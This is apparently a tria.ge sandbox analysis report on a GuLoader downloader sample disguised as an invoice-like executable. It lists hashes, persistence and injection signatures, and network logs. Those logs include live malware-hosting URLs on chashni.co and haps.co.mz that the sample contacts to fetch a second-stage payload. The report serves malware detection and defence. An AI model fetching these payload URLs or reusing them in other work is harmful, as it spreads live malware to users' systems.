Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

1151 AZKON...24.exe

windows10-2004-x64

10

$PLUGINSDI...em.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    39s
  • max time network
    69s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/02/2024, 05:59 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1151 AZKOND - KELBECER 30.01.2024.exe

  • Size

    1.2MB

  • MD5

    9b74b84e9c07cb1b16c40914ad401add

  • SHA1

    992e3d4337a8b19a7acffb178809c44d13f7e637

  • SHA256

    390b6fdbe11dae817ab38e25cc9974833eccf4a04e0307729b0c8507c15ed211

  • SHA512

    d45eb31685f88c755fa46a30e52c482187254f9713fdbc7d5f5deded77529bd3c801feb7804a4231d9f4201ee1e7d16dd1f6dac7dd3d0cc94b43fd513d976547

  • SSDEEP

    24576:dUnj9eiATpkYWFz+59iz+hDkiUgEnTZUQplhDx3nxEWfi80HcUiAEVc:daeiATBAz+riz+JVlEnTrpfJ9f0Hd2m

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1151 AZKOND - KELBECER 30.01.2024.exe
    "C:\Users\Admin\AppData\Local\Temp\1151 AZKOND - KELBECER 30.01.2024.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Program Files (x86)\windows mail\wab.exe
      "C:\Users\Admin\AppData\Local\Temp\1151 AZKOND - KELBECER 30.01.2024.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2304

Network

  • flag-us
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    chashni.co
    Remote address:
    8.8.8.8:53
    Request
    chashni.co
    IN A
    Response
    chashni.co
    IN A
    104.21.14.108
    chashni.co
    IN A
    172.67.158.167
  • flag-us
    GET
    http://chashni.co/jjTrpCQFr22.bin
    Remote address:
    104.21.14.108:80
    Request
    GET /jjTrpCQFr22.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: chashni.co
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 01 Feb 2024 06:01:27 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Thu, 01 Feb 2024 07:01:27 GMT
    Location: https://chashni.co/jjTrpCQFr22.bin
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6GTOveomWFNP43TXqQ2Si5JaowAi%2BIKTTApFuihDPDuJnxZYIJItCtPed19fKI5pg0vQMIp5oinXoCbVy0vTZ4cm0usdd6SUKZuhEF5uA5bT08GGrru3ElABV%2Fnz"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 84e7fadaa8113d8e-LHR
    alt-svc: h2=":443"; ma=60
  • flag-us
    DNS
    x2.c.lencr.org
    Remote address:
    8.8.8.8:53
    Request
    x2.c.lencr.org
    IN A
    Response
    x2.c.lencr.org
    IN CNAME
    crl.root-x1.letsencrypt.org.edgekey.net
    crl.root-x1.letsencrypt.org.edgekey.net
    IN CNAME
    e8652.dscx.akamaiedge.net
    e8652.dscx.akamaiedge.net
    IN A
    173.222.13.40
  • flag-gb
    GET
    http://x2.c.lencr.org/
    Remote address:
    173.222.13.40:80
    Request
    GET / HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: x2.c.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/pkix-crl
    Last-Modified: Fri, 04 Aug 2023 20:57:56 GMT
    ETag: "64cd6654-12c"
    Cache-Control: max-age=3600
    Expires: Thu, 01 Feb 2024 07:01:28 GMT
    Date: Thu, 01 Feb 2024 06:01:28 GMT
    Content-Length: 300
    Connection: keep-alive
  • flag-us
    DNS
    108.14.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    108.14.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    40.13.222.173.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    40.13.222.173.in-addr.arpa
    IN PTR
    Response
    40.13.222.173.in-addr.arpa
    IN PTR
    a173-222-13-40deploystaticakamaitechnologiescom
  • flag-us
    DNS
    18.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.134.221.88.in-addr.arpa
    IN PTR
    Response
    18.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-18deploystaticakamaitechnologiescom
  • flag-us
    DNS
    haps.co.mz
    Remote address:
    8.8.8.8:53
    Request
    haps.co.mz
    IN A
    Response
    haps.co.mz
    IN A
    198.23.58.146
  • flag-us
    GET
    http://haps.co.mz/jjTrpCQFr22.bin
    Remote address:
    198.23.58.146:80
    Request
    GET /jjTrpCQFr22.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: haps.co.mz
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: application/octet-stream
    last-modified: Mon, 22 Jan 2024 23:51:31 GMT
    accept-ranges: bytes
    content-length: 494656
    date: Thu, 01 Feb 2024 06:01:39 GMT
    server: LiteSpeed
  • flag-us
    DNS
    146.58.23.198.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    146.58.23.198.in-addr.arpa
    IN PTR
    Response
    146.58.23.198.in-addr.arpa
    IN PTR
    moz-hostingcom
  • flag-us
    DNS
    173.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    173.178.17.96.in-addr.arpa
    IN PTR
    Response
    173.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-173deploystaticakamaitechnologiescom
  • 104.21.14.108:80
    http://chashni.co/jjTrpCQFr22.bin
    http
    354 B
     765 B
     4
    3

    HTTP Request

    GET http://chashni.co/jjTrpCQFr22.bin

    HTTP Response

    301
  • 104.21.14.108:443
    chashni.co
    tls
    6.1kB
     145.8kB
     123
    121
  • 173.222.13.40:80
    http://x2.c.lencr.org/
    http
    299 B
     721 B
     4
    3

    HTTP Request

    GET http://x2.c.lencr.org/

    HTTP Response

    200
  • 198.23.58.146:80
    http://haps.co.mz/jjTrpCQFr22.bin
    http
    17.2kB
     509.7kB
     370
    369

    HTTP Request

    GET http://haps.co.mz/jjTrpCQFr22.bin

    HTTP Response

    200
  • 8.8.8.8:53
    154.239.44.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    154.239.44.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    chashni.co
    dns
    56 B
     88 B
     1
    1

    DNS Request

    chashni.co

    DNS Response

    104.21.14.108
    172.67.158.167

  • 8.8.8.8:53
    x2.c.lencr.org
    dns
    60 B
     165 B
     1
    1

    DNS Request

    x2.c.lencr.org

    DNS Response

    173.222.13.40

  • 8.8.8.8:53
    108.14.21.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    108.14.21.104.in-addr.arpa

  • 8.8.8.8:53
    40.13.222.173.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    40.13.222.173.in-addr.arpa

  • 8.8.8.8:53
    18.134.221.88.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    18.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    haps.co.mz
    dns
    56 B
     72 B
     1
    1

    DNS Request

    haps.co.mz

    DNS Response

    198.23.58.146

  • 8.8.8.8:53
    146.58.23.198.in-addr.arpa
    dns
    72 B
     101 B
     1
    1

    DNS Request

    146.58.23.198.in-addr.arpa

  • 8.8.8.8:53
    173.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    173.178.17.96.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nsm7DFC.tmp\System.dll
    Filesize

    11KB

    MD5

    a4dd044bcd94e9b3370ccf095b31f896

    SHA1

    17c78201323ab2095bc53184aa8267c9187d5173

    SHA256

    2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc

    SHA512

    87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

    Download Submit

  • memory/2304-57-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-69-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-71-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-70-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-40-0x0000000001C60000-0x0000000003964000-memory.dmp

    Filesize

    29.0MB

    Download

  • memory/2304-41-0x00000000774A8000-0x00000000774A9000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2304-42-0x0000000077421000-0x0000000077541000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/2304-50-0x0000000001C60000-0x0000000003964000-memory.dmp

    Filesize

    29.0MB

    Download

  • memory/2304-51-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-52-0x0000000077421000-0x0000000077541000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/2304-54-0x0000000001C60000-0x0000000003964000-memory.dmp

    Filesize

    29.0MB

    Download

  • memory/2304-58-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-68-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-56-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-55-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-59-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-60-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-61-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-62-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-63-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-65-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-66-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2304-67-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4992-37-0x0000000077421000-0x0000000077541000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/4992-36-0x0000000004330000-0x0000000006034000-memory.dmp

    Filesize

    29.0MB

    Download

  • memory/4992-39-0x0000000010000000-0x0000000010006000-memory.dmp

    Filesize

    24KB

    Download

  • memory/4992-38-0x0000000004330000-0x0000000006034000-memory.dmp

    Filesize

    29.0MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.